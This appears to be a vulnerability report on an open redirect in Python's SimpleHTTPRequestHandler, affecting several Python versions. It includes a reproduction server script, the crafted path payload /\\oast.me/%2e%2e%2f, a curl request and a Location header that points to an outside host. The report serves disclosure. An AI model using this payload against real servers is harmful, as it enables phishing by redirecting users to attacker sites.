Open
Description
Bug Report
Description
We identified that when using Simple HTTP in Python 3.9.19 with the payload /\\oast.me/%2e%2e%2f, an open redirect vulnerability arises.
This could potentially allow attackers to redirect users to malicious websites or resources, leading to phishing attacks or the exploitation of sensitive information.
Steps to Reproduce
- Run the following code with Python 3.9.19.
#!/usr/bin/env python3
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
address = ''
port = 8080
Handler = SimpleHTTPRequestHandler
TCPServer((address, port), Handler).serve_forever()- Craft a payload containing
/\\oast.me/%2e%2e%2f.. - Attempt to access the server with the crafted payload.
- Observe the redirection behavior.
Output of curl
$ curl --noproxy "*" -I -x GET http://127.0.0.1:8080/\\oast.me/%2e%2e%2f
HTTP/1.0 301 Moved Permanently
Server: SimpleHTTP/0.6 Python/3.9.19
Date: Mon, 21 Apr 2025 11:06:08 GMT
Location: /\oast.me/%2e%2e%2f/
Content-Length: 0Issue
If the URL path contains /\\oast.me/%2e%2e%2f, the response of Location header includes /\oast.me/%2e%2e%2f/.
It redirects to http://oast.me/..%2f/.
Expected Result
If the Location header starts with /, it is interpreted as a relative path on the same server.
Version
3.9.19
3.9.21
3.8.18
3.12.5
OS
Ubuntu 20.04.6 LTS